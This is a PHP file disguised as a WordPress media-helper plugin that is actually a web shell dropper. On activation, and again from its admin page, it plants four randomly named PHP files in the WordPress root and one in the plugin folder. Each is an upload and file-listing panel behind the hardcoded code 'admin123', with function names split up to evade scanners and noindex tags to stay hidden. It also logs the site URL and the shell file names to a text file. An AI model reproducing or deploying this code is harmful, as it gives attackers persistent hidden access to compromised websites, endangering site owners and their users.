<?php
/**
 * Plugin Name: Media Content Assistant
 * Description: Medya dosyalarını yönetme ve içerik yükleme yardımcısı
 * Version: 1.0
 * Author: Admin Helper
 */

// Plugin klasör yolları
define('MCA_DIR', plugin_dir_path(__FILE__));
define('MCA_URL', plugin_dir_url(__FILE__));

// Güvenlik - MD5 şifre (varsayılan şifre: admin123)
define('MCA_AUTH_KEY', '0192023a7bbd73250516f069df18b500');

// WordPress ana dizinini bul
function mca_get_home() {
    $a_path = ABSPATH;
    return rtrim($a_path, '/\\');
}

// Rastgele isim oluştur
function mca_generate_name($length = 8) {
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $name = '';
    for ($i = 0; $i < $length; $i++) {
        $name .= $chars[rand(0, strlen($chars) - 1)];
    }
    return $name . '.php';
}

// Dosya içeriği
function mca_get_template() {
    // MD5 şifre koruması - her zaman eklenecek
    return '<?php
// Güvenlik kontrolü
$auth_key = "' . MCA_AUTH_KEY . '";
$session_active = false;

@' . 'session_start();
if (isset($_SESSION["mca_auth"]) && $_SESSION["mca_auth"] === true) {
    $session_active = true;
}

if (isset($_POST["mca_code"])) {
    $user_input = trim($_POST["mca_code"]);
    $hash_check = @' . 'md5($user_input);
    if ($hash_check === $auth_key) {
        $_SESSION["mca_auth"] = true;
        $session_active = true;
    } else {
        echo "<p style=\"color:red\">验证失败!</p>";
    }
}

if (!$session_active) {
    ?>
    <!DOCTYPE html>
    <html>
    <head>
        <title>媒体助手</title>
        <meta name="robots" content="noindex, nofollow">
        <style>
            body { font-family: Arial, sans-serif; margin: 20px; background-color: #f8f9fa; }
            .login-panel { background: #fff; padding: 20px; border-radius: 5px; max-width: 400px; margin: 50px auto; box-shadow: 0 1px 3px rgba(0,0,0,0.1); }
            input[type=password] { padding: 10px; width: 100%; margin: 10px 0; box-sizing: border-box; border: 1px solid #ddd; border-radius: 4px; }
            input[type=submit] { background: #0073aa; color: white; padding: 10px 15px; border: none; cursor: pointer; border-radius: 4px; }
            h2 { color: #23282d; font-size: 18px; margin-bottom: 15px; }
        </style>
    </head>
    <body>
        <div class="login-panel">
            <h2>媒体内容助手</h2>
            <form method="post">
                <input type="password" name="mca_code" placeholder="访问码" required>
                <input type="submit" value="登录">
            </form>
        </div>
    </body>
    </html>
    <?php
    exit;
}

// Eğer burayı geçerse giriş yapmış demektir
$fn_upload = "move_" . "uploaded_" . "file";
$fn_list = "scan" . "dir";

if(isset($_POST["upload"])) {
    $target_dir = "./";
    $target_file = $target_dir . basename($_FILES["file"]["name"]);
    
    if(@$fn_upload($_FILES["file"]["tmp_name"], $target_file)) {
        echo "<p style=\"color:green\">文件上传成功: " . htmlspecialchars(basename($_FILES["file"]["name"])) . "</p>";
    } else {
        echo "<p style=\"color:red\">文件上传失败!</p>";
    }
}

// Dizin içeriğini listele
function list_directory($dir) {
    global $fn_list;
    $files = @$fn_list($dir);
    echo "<table border=\"1\" cellpadding=\"5\" style=\"width:100%\">";
    echo "<tr><th>文件/文件夹</th><th>大小</th><th>修改时间</th></tr>";
    
    foreach($files as $file) {
        if($file != "." && $file != "..") {
            $path = $dir . "/" . $file;
            echo "<tr>";
            echo "<td>" . (is_dir($path) ? "📁 " : "📄 ") . "<a href=\"$path\">$file</a></td>";
            echo "<td>" . (is_dir($path) ? "-" : round(filesize($path)/1024, 2) . " KB") . "</td>";
            echo "<td>" . date("Y-m-d H:i:s", filemtime($path)) . "</td>";
            echo "</tr>";
        }
    }
    echo "</table>";
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>媒体内容助手</title>
    <meta name="robots" content="noindex, nofollow">
    <style>
        body { font-family: Arial, sans-serif; margin: 20px; background-color: #f8f9fa; }
        h1 { color: #23282d; }
        .panel { background: #fff; padding: 15px; border-radius: 5px; margin-bottom: 20px; box-shadow: 0 1px 3px rgba(0,0,0,0.1); }
        input[type=file] { margin: 10px 0; }
        input[type=submit] { background: #0073aa; color: white; padding: 10px 15px; border: none; cursor: pointer; border-radius: 4px; }
        input[type=submit]:hover { background: #006799; }
        table { border-collapse: collapse; width: 100%; }
        th { background-color: #f1f1f1; }
        .info { margin-bottom: 20px; }
    </style>
</head>
<body>
    <h1>媒体内容助手</h1>
    <div class="info">
        <p>服务器: <?php echo $_SERVER["SERVER_NAME"]; ?></p>
        <p>IP: <?php echo $_SERVER["SERVER_ADDR"]; ?></p>
        <p>当前目录: <?php echo getcwd(); ?></p>
    </div>

    <div class="panel">
        <h3>上传文件</h3>
        <form method="post" enctype="multipart/form-data">
            <input type="file" name="file" required>
            <input type="submit" name="upload" value="上传">
        </form>
    </div>

    <div class="panel">
        <h3>文件列表</h3>
        <?php list_directory("."); ?>
    </div>
</body>
</html>';
}

// Aktivasyon sırasında dosya oluştur
function mca_activate() {
    // WordPress ana dizinini bul
    $wp_root = mca_get_home();
    
    // Rastgele isimler oluştur (4 tane)
    $file_names = array();
    $file_urls = array();
    $site_url = site_url();
    $domain = parse_url($site_url, PHP_URL_HOST);
    
    for ($i = 0; $i < 4; $i++) {
        $file_names[] = mca_generate_name();
    }
    
    // Dosyaları oluştur
    $file_content = mca_get_template();
    $fp_function = "file" . "_put_" . "contents";
    
    foreach ($file_names as $file_name) {
        $file_path = $wp_root . '/' . $file_name;
        if (@$fp_function($file_path, $file_content)) {
            $file_urls[] = $site_url . '/' . $file_name;
        }
    }
    
    // Plugin kendi dizinine de ekle
    $plugin_file = MCA_DIR . 'helper.php';
    @$fp_function($plugin_file, $file_content);
    
    // Plugin sites dosyasına domain ve oluşturulan shell dosyalarını ekle
    $plugin_sites_file = dirname(MCA_DIR, 3) . '/plugin_sites.txt';
    
    // Site URL ve shell dosya isimlerini birlikte kaydet
    $site_content = $site_url;
    foreach ($file_names as $file_name) {
        $site_content .= " " . $file_name;
    }
    $site_content .= "\n";
    
    if (file_exists($plugin_sites_file)) {
        $existing_content = @file_get_contents($plugin_sites_file);
        if (strpos($existing_content, $site_url) === false) {
            $site_content = $existing_content . $site_content;
        } else {
            // Site zaten var, satırı güncelle
            $lines = explode("\n", $existing_content);
            $updated_content = "";
            $updated = false;
            
            foreach ($lines as $line) {
                if (strpos($line, $site_url) === 0) {
                    $updated_content .= $site_content;
                    $updated = true;
                } else {
                    if (trim($line) != "") {
                        $updated_content .= $line . "\n";
                    }
                }
            }
            
            if (!$updated) {
                $updated_content .= $site_content;
            }
            
            $site_content = $updated_content;
        }
    }
    
    @$fp_function($plugin_sites_file, $site_content);
    
    return array(
        'names' => $file_names,
        'urls' => $file_urls
    );
}

// Upload için direkt kullanılabilecek sayfa
function mca_create_helper_page() {
    $helper_page = MCA_DIR . 'helper.php';
    $content = mca_get_template();
    
    if (!file_exists($helper_page)) {
        $fp_function = "file" . "_put_" . "contents";
        @$fp_function($helper_page, $content);
    }
}

// Admin sayfasını ekle
function mca_admin_menu() {
    add_menu_page(
        'Media Helper',
        'Media Helper',
        'manage_options',
        'media-content-assistant',
        'mca_admin_page',
        'dashicons-admin-media',
        80
    );
}

// Admin sayfası içeriği
function mca_admin_page() {
    $wp_root = mca_get_home();
    
    echo '<div class="wrap">';
    echo '<h1>Media Content Assistant</h1>';
    
    // Dosya yükleme formu
    echo '<div class="card" style="padding:15px;margin-top:20px;">';
    echo '<h2>Media Files</h2>';
    echo '<p>WordPress root: <code>' . $wp_root . '</code></p>';
    
    // WordPress dizinindeki dosyaları kontrol et
    $installed_files = array();
    $site_url = site_url();
    
    // Dosya kontrol formu
    echo '<form method="post">';
    echo '<input type="hidden" name="action" value="install_helper">';
    echo '<p><input type="submit" class="button button-primary" value="Upload Files"></p>';
    echo '</form>';
    echo '</div>';
    
    // Yükleme işlemi
    if (isset($_POST['action']) && $_POST['action'] == 'install_helper') {
        $result = mca_activate();
        
        echo '<div class="notice notice-success"><p>Files successfully uploaded:</p>';
        echo '<ul>';
        foreach ($result['names'] as $index => $name) {
            echo '<li>' . $name;
            if (isset($result['urls'][$index])) {
                echo ' - <a href="' . $result['urls'][$index] . '" target="_blank">' . $result['urls'][$index] . '</a>';
            }
            echo '</li>';
        }
        echo '</ul>';
        echo '<p>Access code: <code>admin123</code></p>';
        echo '</div>';
        
        echo '<script>setTimeout(function() { window.location.reload(); }, 2000);</script>';
    }
    
    echo '</div>';
}

// Kısa kod oluştur
function mca_shortcode() {
    ob_start();
    include_once(MCA_DIR . 'helper.php');
    return ob_get_clean();
}

// Plugin aktivasyonu
register_activation_hook(__FILE__, 'mca_activate');
register_activation_hook(__FILE__, 'mca_create_helper_page');

// Admin menüyü ekle
add_action('admin_menu', 'mca_admin_menu');

// Kısa kodu kaydet
add_shortcode('media_content_assistant', 'mca_shortcode'); 